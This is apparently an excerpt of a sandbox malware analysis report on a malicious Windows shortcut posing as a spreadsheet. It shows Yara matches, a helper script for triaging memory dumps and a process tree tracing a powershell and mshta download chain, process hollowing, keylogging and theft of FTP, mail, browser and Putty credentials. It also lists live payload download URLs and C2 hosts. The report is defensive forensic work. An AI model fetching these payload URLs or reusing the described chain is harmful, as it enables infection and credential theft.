                    Source: Yara match | File source: 0000001B.00000002.2554879629.000000003DD31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: bwsiuvcU.pif PID: 6340, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: bwsiuvcU.pif PID: 2196, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: bwsiuvcU.pif PID: 2324, type: MEMORYSTR
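The Yara match lists in this section and in the Remote Access Functionality section below are the same hundred-odd memory dumps and unpacked PEs, repeated because the stealer and RAT rules both fire on them. The script below is an added example, not Joe Sandbox code, that folds such a list into one view per process and picks out the regions worth pulling the payload from. The field layout it parses (hex process index, dump stage, dump id, base address, page protection, allocation flags, memory type) is inferred from the values on this page, not from Joe Sandbox documentation, and the sample list is a constructed subset of the rows above; the PAGE_* and MEM_* values are the documented Win32 constants. A private region that is PAGE_EXECUTE_READWRITE at an image-like base such as 0x400000 is the usual footprint of a hollowed or manually mapped payload.

```python
"""Added example (not Joe Sandbox code): condense Yara match rows into a
per-process view of matched memory regions and single out the private
executable regions that hold unpacked code."""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional

# Layout inferred from this page, not documented:
# <proc index hex>.<stage>.<dump id>.<base>.<protect>.<flags>.<type>.<reserved>.sdmp
SDMP_RE = re.compile(
    r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})"
    r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$")
# <proc index dec>.<stage>.<image>.<base hex>.<n>[.raw].unpack
UNPACK_RE = re.compile(r"^(\d+)\.(\d+)\.(.+?)\.([0-9A-Fa-f]+)\.(\d+)(\.raw)?\.unpack$")

# Documented Win32 memory constants used to decode the protect and type fields.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
MEM_PRIVATE = 0x20000


@dataclass(frozen=True)
class DumpRef:
    kind: str                 # "sdmp" or "unpack"
    proc: int                 # sandbox process index (23, 25, 27 ...), not the OS PID
    stage: int                # 1 = start, 2 = end, 3 = intermediate (inferred)
    base: int
    protect: Optional[int] = None
    mem_type: Optional[int] = None
    image: Optional[str] = None
    raw: bool = False

    @property
    def executable(self):
        # low byte carries the PAGE_* value; 0x10..0x80 are the executable ones
        return self.protect is not None and bool(self.protect & 0xF0)

    def describe(self):
        if self.kind == "unpack":
            return f"proc {self.proc} stage {self.stage} base {self.base:#x} unpacked PE from {self.image}"
        prot = PAGE_PROTECT.get(self.protect & 0xFF, hex(self.protect))
        typ = MEM_TYPE.get(self.mem_type, hex(self.mem_type))
        return f"proc {self.proc} stage {self.stage} base {self.base:#x} {prot} {typ}"


def parse_dump_name(name):
    """Parse either dump-name form; None for anything else."""
    m = SDMP_RE.match(name)
    if m:
        return DumpRef("sdmp", int(m[1], 16), int(m[2], 16), int(m[4], 16),
                       protect=int(m[5], 16), mem_type=int(m[7], 16))
    m = UNPACK_RE.match(name)
    if m:
        return DumpRef("unpack", int(m[1]), int(m[2]), int(m[4], 16),
                       image=m[3], raw=m[6] is not None)
    return None


def regions_by_process(names):
    """{proc index: {base: [DumpRef, ...]}}; stage 1/2 and raw/unpack copies of
    the same region fold into one key."""
    by_proc = defaultdict(lambda: defaultdict(list))
    for n in names:
        ref = parse_dump_name(n)
        if ref is not None:
            by_proc[ref.proc][ref.base].append(ref)
    return by_proc


def payload_candidates(names):
    """Private memory that is executable: where an unpacker or process hollower
    put code that was never on disk. Returns sorted (proc, base) pairs."""
    return sorted({(r.proc, r.base) for r in map(parse_dump_name, names)
                   if r and r.kind == "sdmp" and r.executable and r.mem_type == MEM_PRIVATE})


# Constructed subset of the match rows on this page.
SAMPLE_MATCHES = [
    "00000019.00000002.1788431061.0000000025FC1000.00000004.00000800.00020000.00000000.sdmp",
    "00000017.00000002.1680679015.000000003DE32000.00000004.00000800.00020000.00000000.sdmp",
    "00000017.00000002.1682459055.00000000409C0000.00000004.08000000.00040000.00000000.sdmp",
    "00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp",
    "00000017.00000002.1639938993.0000000000400000.00000040.00000400.00020000.00000000.sdmp",
    "00000017.00000002.1639938993.0000000000450000.00000040.00000400.00020000.00000000.sdmp",
    "0000001B.00000001.1707928386.00000000004A0000.00000040.00000001.00020000.00000000.sdmp",
    "00000013.00000003.1494437975.000000007EB10000.00000004.00001000.00020000.00000000.sdmp",
    "23.2.bwsiuvcU.pif.400000.0.unpack",
    "23.2.bwsiuvcU.pif.400000.0.raw.unpack",
    "27.1.bwsiuvcU.pif.400000.0.unpack",
]

if __name__ == "__main__":
    for proc, bases in sorted(regions_by_process(SAMPLE_MATCHES).items()):
        for base, refs in sorted(bases.items()):
            print(refs[0].describe(), f"({len(refs)} dumps)")
    print("payload candidates:", [(p, hex(b)) for p, b in payload_candidates(SAMPLE_MATCHES)])
```

With the full list pasted in, the output shrinks the two hundred rows to three bwsiuvcU.pif processes, one uc.exe process and a handful of bases; the stage 2 dumps of the RWX private regions are the ones to feed to a .NET decompiler, since they hold the payload after unpacking finished.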

                    Remote Access Functionality

                    Source: Yara match | File source: 00000019.00000002.1788431061.0000000025FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000017.00000002.1680679015.000000003DE32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001B.00000002.2554879629.000000003DD81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000017.00000002.1680679015.000000003DDE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000017.00000002.1680679015.000000003DE5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000002.1788431061.0000000025FEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000002.1788431061.0000000025F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001B.00000002.2554879629.000000003DDAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001B.00000002.2554879629.000000003DD31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: bwsiuvcU.pif PID: 6340, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: bwsiuvcU.pif PID: 2196, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: bwsiuvcU.pif PID: 2324, type: MEMORYSTR
                    Source: Yara match | File source: 27.3.bwsiuvcU.pif.3bd8fed0.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.bwsiuvcU.pif.3ede5570.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.bwsiuvcU.pif.26fc9b90.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.bwsiuvcU.pif.284a0f08.7.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.bwsiuvcU.pif.40260000.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.bwsiuvcU.pif.3daa5566.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.bwsiuvcU.pif.3dad5566.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.bwsiuvcU.pif.3ee39b90.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.bwsiuvcU.pif.409b0000.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.bwsiuvcU.pif.3ed35570.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.bwsiuvcU.pif.284a0000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.bwsiuvcU.pif.3daa5566.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.bwsiuvcU.pif.26f76478.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.bwsiuvcU.pif.40260000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.3.bwsiuvcU.pif.3bd8fed0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.bwsiuvcU.pif.3daa646e.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.bwsiuvcU.pif.40350000.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.bwsiuvcU.pif.3dad646e.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.bwsiuvcU.pif.3daa646e.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.bwsiuvcU.pif.3ed35570.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.bwsiuvcU.pif.26f75570.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.bwsiuvcU.pif.3ede5570.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.bwsiuvcU.pif.25dd646e.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.bwsiuvcU.pif.28c40000.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.bwsiuvcU.pif.3ede6478.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.bwsiuvcU.pif.28c40000.8.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.bwsiuvcU.pif.3ed36478.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.bwsiuvcU.pif.40260f08.7.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.bwsiuvcU.pif.3ed36478.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.bwsiuvcU.pif.3ed89b90.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.bwsiuvcU.pif.26f75570.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.bwsiuvcU.pif.25dd646e.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.bwsiuvcU.pif.284a0f08.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.bwsiuvcU.pif.25dd5566.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.bwsiuvcU.pif.284a0000.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.bwsiuvcU.pif.40350f08.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.bwsiuvcU.pif.409c0000.8.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.bwsiuvcU.pif.26f76478.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.bwsiuvcU.pif.409b0000.8.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.bwsiuvcU.pif.40350000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.bwsiuvcU.pif.409c0000.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.bwsiuvcU.pif.3dad5566.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.bwsiuvcU.pif.26fc9b90.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.bwsiuvcU.pif.40350f08.7.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.bwsiuvcU.pif.25dd5566.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.bwsiuvcU.pif.3ed89b90.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.bwsiuvcU.pif.3ede6478.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.3.bwsiuvcU.pif.3bdc99c8.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.3.bwsiuvcU.pif.3bdc99c8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000017.00000002.1680345757.000000003DA95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000017.00000002.1682459055.00000000409C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000002.1787983024.0000000025D95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001B.00000002.2555827704.0000000040350000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000002.1791650361.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001B.00000002.2556241672.00000000409B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001B.00000003.1719620200.000000003BD8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000017.00000003.1516343993.000000003BDC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001B.00000002.2554498447.000000003DA65000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000017.00000002.1681909755.0000000040260000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000003.1634916828.0000000023FF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000017.00000002.1681582310.000000003EDE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001B.00000002.2555544877.000000003ED31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000002.1792368001.0000000028C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000002.1790805820.0000000026F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 23.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 27.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000017.00000002.1639938993.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000001.1624046151.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000002.1732584170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000013.00000003.1494437975.000000007EB10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000017.00000002.1639938993.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000002.1732584170.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001B.00000001.1707928386.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001B.00000002.2524457336.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.1519434101.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.2524457336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000001.1494452738.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.2524457336.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000001.1624046151.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000001.1624046151.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000001.1494452738.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000001.1707928386.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.1639938993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000001.1707928386.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.1732584170.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact)
Behavior Graph (ID: 1430751; Sample: FT. 40FE CNY .xlsx.lnk; Start date: 24/04/2024; Architecture: WINDOWS; Score: 100)

Process tree reconstructed from the graph; numbers in parentheses after a process name are the counters the graph shows on that node, and "->" marks a started child process.

Start
  • DNS/IP: www.sessosesso.it; sessosesso.it; 7 other IPs or domains
  • Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 20 other signatures
  -> powershell.exe (15)
      • Signatures: Windows shortcut file (LNK) starts blacklisted processes; Found suspicious powershell code related to unpacking or dynamic code loading; Powershell drops PE file
      -> mshta.exe (16)
          • DNS/IP: www.sessosesso.it 89.46.106.29, 443, 49705, 49710, ARUBA-ASNIT Italy
          • Signatures: Windows shortcut file (LNK) starts blacklisted processes; Suspicious powershell command line found
          -> powershell.exe (16)
              • Signatures: Windows shortcut file (LNK) starts blacklisted processes
              -> powershell.exe (14 31)
                  • Dropped: C:\Users\user\AppData\Roaming\uc.exe, PE32
                  -> uc.exe (1 8)
                      • DNS/IP: dual-spov-0006.spov-msedge.net 13.107.139.11, 443, 49715, 49716, MICROSOFT-CORP-MSN-AS-BLOCKUS United States
                      • Dropped: C:\Users\Public\Libraries\netutils.dll, PE32+; C:\Users\Public\Libraries\easinvoker.exe, PE32+; C:\Users\Public\Libraries\bwsiuvcU.pif, PE32; 2 other malicious files
                      • Signatures: Windows shortcut file (LNK) starts blacklisted processes; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 4 other signatures
                      -> bwsiuvcU.pif (2)
                          • DNS/IP: mail.irmaklarpaslanmaz.com.tr 192.185.124.132, 49721, 49722, 49723, UNIFIEDLAYER-AS-1US United States
                          • Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); 3 other signatures
                      -> extrac32.exe (1)
                          • Dropped: C:\Users\Public\Libraries\Ucvuiswb.PIF, PE32
                          • Signatures: Drops PE files with a suspicious file extension
                      -> cmd.exe (1)
                          -> conhost.exe
              -> conhost.exe
      -> conhost.exe (1)
  -> Ucvuiswb.PIF
      • Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Writes to foreign memory regions
      -> bwsiuvcU.pif
          • Signatures: Installs a global keyboard hook
  -> Ucvuiswb.PIF
      • Signatures: Allocates memory in foreign processes; Sample uses process hollowing technique
      -> bwsiuvcU.pif
          • Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)
  -> svchost.exe (1 1)
      • DNS/IP: 127.0.0.1 unknown unknown

Source | Detection | Scanner | Label | Link
FT. 40FE CNY .xlsx.lnk | 32% | ReversingLabs | Shortcut.Trojan.RedLine |
FT. 40FE CNY .xlsx.lnk | 24% | Virustotal | | Browse
FT. 40FE CNY .xlsx.lnk | 100% | Avira | LNK/Dldr.Agent.VPYB |
FT. 40FE CNY .xlsx.lnk | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\Public\Libraries\Ucvuiswb.PIF | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\uc.exe | 100% | Joe Sandbox ML | |
C:\Users\Public\Libraries\Ucvuiswb.PIF | 58% | ReversingLabs | |
C:\Users\Public\Libraries\Ucvuiswb.PIF | 38% | Virustotal | | Browse
C:\Users\Public\Libraries\bwsiuvcU.pif | 3% | ReversingLabs | |
C:\Users\Public\Libraries\bwsiuvcU.pif | 0% | Virustotal | | Browse
C:\Users\Public\Libraries\easinvoker.exe | 0% | ReversingLabs | |
C:\Users\Public\Libraries\easinvoker.exe | 0% | Virustotal | | Browse
C:\Users\Public\Libraries\netutils.dll | 29% | ReversingLabs | Win64.Trojan.Zusy |
C:\Users\Public\Libraries\netutils.dll | 47% | Virustotal | | Browse
C:\Users\user\AppData\Roaming\uc.exe | 58% | ReversingLabs | |
C:\Users\user\AppData\Roaming\uc.exe | 38% | Virustotal | | Browse
                    No Antivirus matches
Source | Detection | Scanner | Label | Link
sessosesso.it | 0% | Virustotal | | Browse
dual-spov-0006.spov-msedge.net | 0% | Virustotal | | Browse
www.sessosesso.it | 2% | Virustotal | | Browse
Source | Detection | Scanner | Label | Link
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | 0% | URL Reputation | safe |
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe |
http://crl.microsoft | 0% | URL Reputation | safe |
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | 0% | URL Reputation | safe |
http://x1.c.lencr.org/0 | 0% | URL Reputation | safe |
http://x1.i.lencr.org/0 | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
http://r3.o.lencr.org0 | 0% | URL Reputation | safe |
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 | 0% | URL Reputation | safe |
https://sectigo.com/CPS0 | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware |
https://go.micro | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
http://ocsp.sectigo.com0C | 0% | URL Reputation | safe |
https://www.sessosesso.it/assets/aw/yt.htaAC: | 0% | Avira URL Cloud | safe |
https://www.sessosesso.it/assets/aw/yt.htaU | 0% | Avira URL Cloud | safe |
https://www.sessosesso.it/assets/aw/yt.htahttps://www.sessosesso.it/assets/aw/yt.hta | 0% | Avira URL Cloud | safe |
https://www.sessosesso.it/assets/aw/yt.hta6288 | 0% | Avira URL Cloud | safe |
https://www.sessosesso.it/assets/aw/yt.htaDe | 0% | Avira URL Cloud | safe |
https://www.sessosesso.it/assets/aw/yt.hta_ | 0% | Avira URL Cloud | safe |
https://www.sessosesso.it/assets/aw/yt.htaPS_BROW | 0% | Avira URL Cloud | safe |
https://www.sessosesso.it/assets/aw/uc.exep | 0% | Avira URL Cloud | safe |
https://www.sessosesso.it/assets/aw/yt.hta1 | 0% | Avira URL Cloud | safe |
https://www.sessosesso.it/ | 0% | Avira URL Cloud | safe |
https://www.sessosesso.it/assets/aw/uc.exep | 0% | Virustotal | | Browse
https://www.sessosesso.it/assets/aw/yt.htaindows | 0% | Avira URL Cloud | safe |
https://www.sessosesso.it/assets/aw/uc.exe | 0% | Virustotal | | Browse
https://www.sessosesso.it/assets/aw/yt.htaAC: | 0% | Virustotal | | Browse
https://www.sessosesso.it/assets/aw/yt.htahttps://www.sessosesso.it/assets/aw/yt.hta | 0% | Virustotal | | Browse
https://www.sessosesso.it/ | 2% | Virustotal | | Browse
https://www.sessosesso.it/assets/aw/yt.hta5 | 0% | Avira URL Cloud | safe |
https://www.sessosesso.it/assets/aw/uc.exe | 100% | Avira URL Cloud | malware |
https://www.sessosesso.it | 0% | Avira URL Cloud | safe |
https://www.sessosesso.it/assets/aw/yt.htaH | 0% | Avira URL Cloud | safe |
https://sessosesso.it | 0% | Avira URL Cloud | safe |
https://www.sessosesso.it/assets/aw/yt.htaC: | 0% | Avira URL Cloud | safe |
http://crl.ver) | 0% | Avira URL Cloud | safe |
https://www.sessosesso.it/assets/aw/yt.hta | 0% | Avira URL Cloud | safe |
https://www.sessosesso.it/assets/aw/yt.hta...- | 0% | Avira URL Cloud | safe |
https://www.sessosesso.it/assets/aw/Book1.xlsx | 0% | Avira URL Cloud | safe |
https://sessosesso.it | 1% | Virustotal | | Browse
http://mail.irmaklarpaslanmaz.com.tr | 0% | Avira URL Cloud | safe |
https://www.sessosesso.it/assets/aw/yt.htaC: | 0% | Virustotal | | Browse
http://r3.i.lencr.org/0o | 0% | Avira URL Cloud | safe |
https://www.sessosesso.it/assets/aw/yt.hta... | 0% | Avira URL Cloud | safe |
https://www.sessosesso.it/assets/aw/Book1.xlsx | 0% | Virustotal | | Browse
https://www.sessosesso.it | 2% | Virustotal | | Browse
https://sessosesso.it/assets/aw/Book1.xlsx | 0% | Avira URL Cloud | safe |
https://www.sessosesso.it/assets/aw/yt.htaLMEMX | 0% | Avira URL Cloud | safe |
http://r3.i.lencr.org/0o | 0% | Virustotal | | Browse
http://www.apache.o | 0% | Avira URL Cloud | safe |
https://sessosesso.it/assets/aw/Book1.xlsx | 0% | Virustotal | | Browse
https://www.sessosesso.it/assets/aw/yt.hta... | 0% | Virustotal | | Browse
https://www.sessosesso.it/assets/aw/yt.hta | 0% | Virustotal | | Browse
https://www.sessosesso.it/assets/aw/yt.htaLMEMX | 0% | Virustotal | | Browse
http://www.apache.o | 0% | Virustotal | | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
sessosesso.it | 89.46.106.29 | true | true | | unknown
dual-spov-0006.spov-msedge.net | 13.107.139.11 | true | false | | unknown
www.sessosesso.it | 89.46.106.29 | true | true | | unknown
mail.irmaklarpaslanmaz.com.tr | 192.185.124.132 | true | true | | unknown
zyupsq.by.files.1drv.com | unknown | unknown | false | | high
onedrive.live.com | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://www.sessosesso.it/assets/aw/uc.exe | false | 0%, Virustotal, Browse; Avira URL Cloud: malware | unknown
https://onedrive.live.com/download?resid=849ABDB14CA5CEC3%21220&authkey=!AGW69_d3Nli6r4Y | false | | high
https://www.sessosesso.it/assets/aw/yt.hta | true | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://sessosesso.it/assets/aw/Book1.xlsx | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.sessosesso.it/assets/aw/yt.htaDe | mshta.exe, 00000009.00000003.1853065476.000001A2C46E5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
